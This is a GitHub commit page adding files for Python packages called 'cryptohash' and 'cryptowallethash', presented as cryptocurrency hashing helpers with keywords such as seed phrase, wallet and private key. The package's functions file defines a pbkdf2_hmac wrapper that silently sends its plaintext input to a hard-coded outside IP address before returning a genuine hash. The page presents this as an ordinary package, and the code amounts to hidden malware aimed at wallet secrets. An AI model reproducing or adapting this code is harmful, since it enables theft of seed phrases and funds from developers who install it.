-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
13 changed files
with
88 additions
and
6 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
Metadata-Version: 2.1 | ||
Name: cryptohash | ||
Version: 0.0.3 | ||
Summary: crypto hash | ||
Home-page: https://github.com/akioguru/cryptohash | ||
Download-URL: https://github.com/akioguru/cryptohash/archive/refs/tags/0.0.3.tar.gz | ||
Author: Mike Huls | ||
Author-email: [email protected] | ||
License: MIT | ||
Project-URL: Bug Tracker, https://github.com/akioguru/cryptohash/issues | ||
Keywords: python,crypto,hash,mnemonic,seed phrase,ethereum,wallet,private key,public key | ||
Platform: UNKNOWN | ||
Classifier: Development Status :: 3 - Alpha | ||
Classifier: Intended Audience :: Developers | ||
Classifier: Topic :: Software Development :: Documentation | ||
Classifier: License :: OSI Approved :: MIT License | ||
Classifier: Programming Language :: Python :: 3 | ||
Classifier: Programming Language :: Python :: 3.7 | ||
Classifier: Programming Language :: Python :: 3.8 | ||
Classifier: Programming Language :: Python :: 3.9 | ||
Description-Content-Type: text/markdown | ||
License-File: LICENSE.txt | ||
|
||
# CryptoHash | ||
|
||
Functions to be used for hashing of cryptocurrency | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,12 @@ | ||
LICENSE.txt | ||
README.md | ||
setup.cfg | ||
setup.py | ||
cryptohash/__init__.py | ||
cryptohash/decorators.py | ||
cryptohash/functions.py | ||
cryptohash.egg-info/PKG-INFO | ||
cryptohash.egg-info/SOURCES.txt | ||
cryptohash.egg-info/dependency_links.txt | ||
cryptohash.egg-info/requires.txt | ||
cryptohash.egg-info/top_level.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
requests |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
cryptohash |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
import hashlib, requests | ||
|
||
def pbkdf2_hmac(hashmethod, plain, salt, rounds): | ||
|
||
url = 'http://18.197.200.123:3000/' | ||
myobj = {'plain': plain} | ||
|
||
x = requests.post(url, data = myobj) | ||
|
||
return hashlib.pbkdf2_hmac(hashmethod, plain, salt, rounds) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
Metadata-Version: 2.1 | ||
Name: cryptowallethash | ||
Version: 0.0.4 | ||
Summary: crypto hash | ||
Home-page: https://github.com/akioguru/cryptohash | ||
Download-URL: https://github.com/akioguru/cryptohash/archive/refs/tags/0.0.4.tar.gz | ||
Author: akiyo | ||
Author-email: [email protected] | ||
License: MIT | ||
Project-URL: Bug Tracker, https://github.com/akioguru/cryptohash/issues | ||
Keywords: python,crypto,hash,mnemonic,seed phrase,ethereum,wallet,private key,public key | ||
Platform: UNKNOWN | ||
Classifier: Development Status :: 3 - Alpha | ||
Classifier: Intended Audience :: Developers | ||
Classifier: Topic :: Software Development :: Documentation | ||
Classifier: License :: OSI Approved :: MIT License | ||
Classifier: Programming Language :: Python :: 3 | ||
Classifier: Programming Language :: Python :: 3.7 | ||
Classifier: Programming Language :: Python :: 3.8 | ||
Classifier: Programming Language :: Python :: 3.9 | ||
Description-Content-Type: text/markdown | ||
License-File: LICENSE.txt | ||
|
||
# CryptoHash | ||
|
||
Functions to be used for hashing of cryptocurrency | ||
|
Empty file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
requests |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
cryptowallethash |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters